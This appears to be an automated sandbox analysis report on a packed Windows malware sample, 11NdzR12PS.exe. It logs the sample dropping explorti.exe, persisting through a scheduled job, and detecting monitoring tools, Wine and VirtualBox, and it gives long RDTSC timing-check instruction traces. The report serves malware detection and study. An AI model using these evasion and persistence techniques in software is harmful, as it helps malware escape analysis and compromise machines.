Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: 11NdzR12PS.exe

Static file information: File size 1921536 > 1048576

Source: 11NdzR12PS.exe

Static PE information: Raw size of wokugkrf is bigger than: 0x100000 < 0x1a3800

Data Obfuscation

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Unpacked PE file: 0.2.11NdzR12PS.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 5.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1db077 should be: 0x1e273f
Source: 11NdzR12PS.exe	Static PE information: real checksum: 0x1db077 should be: 0x1e273f

PE file contains sections with non-standard names

Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: .idata
Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: wokugkrf
Source: 11NdzR12PS.exe	Static PE information: section name: csqdmnjl
Source: 11NdzR12PS.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: wokugkrf
Source: explorti.exe.0.dr	Static PE information: section name: csqdmnjl
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_006AD84C push ecx; ret

5_2_006AD85F

Source: 11NdzR12PS.exe	Static PE information: section name: entropy: 7.980756696745502
Source: 11NdzR12PS.exe	Static PE information: section name: wokugkrf entropy: 7.954605137442367
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.980756696745502
Source: explorti.exe.0.dr	Static PE information: section name: wokugkrf entropy: 7.954605137442367

Drops PE files

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process information set: NOOPENFILEERRORBOX

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\11NdzR12PS.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1B3 second address: D9F1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1B8 second address: D9F1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1BD second address: D9F1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A70 second address: F21A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A76 second address: F21A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A7B second address: F21ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FF3408102FBh 0x0000000c popad 0x0000000d jmp 00007FF340810303h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 jmp 00007FF3408102FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FF3408102F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21ABA second address: F21ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21ABE second address: F21AC8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF3408102F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F04D6D second address: F04D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2099B second address: F209A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F209A1 second address: F209F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB2Dh 0x0000000b jmp 00007FF34080AB18h 0x00000010 jmp 00007FF34080AB0Fh 0x00000015 pushad 0x00000016 jmp 00007FF34080AB19h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F20CCC second address: F20CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810300h 0x00000007 jo 00007FF3408102FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21047 second address: F2107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF34080AB10h 0x00000010 jmp 00007FF34080AB0Eh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2107B second address: F210AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102FEh 0x00000008 jno 00007FF340810302h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FF3408102F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210AC second address: F210BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF34080AB0Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210BF second address: F210C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210C5 second address: F210C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24838 second address: F2483E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2483E second address: F24846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2487A second address: F24884 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24884 second address: F2491C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FF34080AB12h 0x0000000e jg 00007FF34080AB0Ch 0x00000014 mov dword ptr [ebp+122D1A07h], esi 0x0000001a push 00000000h 0x0000001c jmp 00007FF34080AB15h 0x00000021 call 00007FF34080AB09h 0x00000026 pushad 0x00000027 pushad 0x00000028 jno 00007FF34080AB06h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 jmp 00007FF34080AB17h 0x00000036 popad 0x00000037 push eax 0x00000038 jnl 00007FF34080AB23h 0x0000003e pushad 0x0000003f jg 00007FF34080AB06h 0x00000045 jmp 00007FF34080AB15h 0x0000004a popad 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pushad 0x00000053 popad 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2491C second address: F2496A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FF3408102FEh 0x00000014 popad 0x00000015 jmp 00007FF3408102FCh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF3408102FAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2496A second address: F249D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, ebx 0x0000000c push 00000003h 0x0000000e add dl, 00000000h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FF34080AB08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub ecx, dword ptr [ebp+122D2A56h] 0x00000033 push 00000003h 0x00000035 add dword ptr [ebp+122D2649h], edi 0x0000003b call 00007FF34080AB09h 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF34080AB16h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F249D5 second address: F249F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF3408102FFh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F249F0 second address: F24A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007FF34080AB10h 0x00000010 pushad 0x00000011 jnp 00007FF34080AB06h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FF34080AB0Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007FF34080AB06h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A23 second address: F24A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF340810302h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A42 second address: F24A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122DB87Dh], edi 0x00000010 lea ebx, dword ptr [ebp+124597A9h] 0x00000016 mov ecx, dword ptr [ebp+122D2B4Eh] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A6C second address: F24A72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A72 second address: F24A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A78 second address: F24A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24ABF second address: F24AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24AD7 second address: F24B58 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B60h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF3408102F8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f or dword ptr [ebp+122DB821h], edi 0x00000035 cld 0x00000036 call 00007FF3408102F9h 0x0000003b push ebx 0x0000003c jo 00007FF3408102F8h 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007FF3408102FCh 0x0000004d pop edx 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push edi 0x00000053 jmp 00007FF340810309h 0x00000058 pop edi 0x00000059 mov eax, dword ptr [eax] 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24D77 second address: F24D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F46169 second address: F4616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4616D second address: F46171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F46171 second address: F4617F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF340810302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4617F second address: F461AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF34080AB06h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FF34080AB0Ah 0x00000012 jmp 00007FF34080AB0Fh 0x00000017 jc 00007FF34080AB0Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F44735 second address: F44739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F44739 second address: F4473F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449AE second address: F449B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449B4 second address: F449C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF34080AB06h 0x0000000e jnp 00007FF34080AB06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449C8 second address: F449E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FF3408102F8h 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449E5 second address: F449FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449FE second address: F44A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450B8 second address: F450C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450C1 second address: F450C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450C5 second address: F450CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4520C second address: F45213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45213 second address: F45227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB0Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45374 second address: F45378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45378 second address: F45395 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF34080AB13h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45395 second address: F4539B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4539B second address: F453B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45BCC second address: F45BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810307h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45BEB second address: F45BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
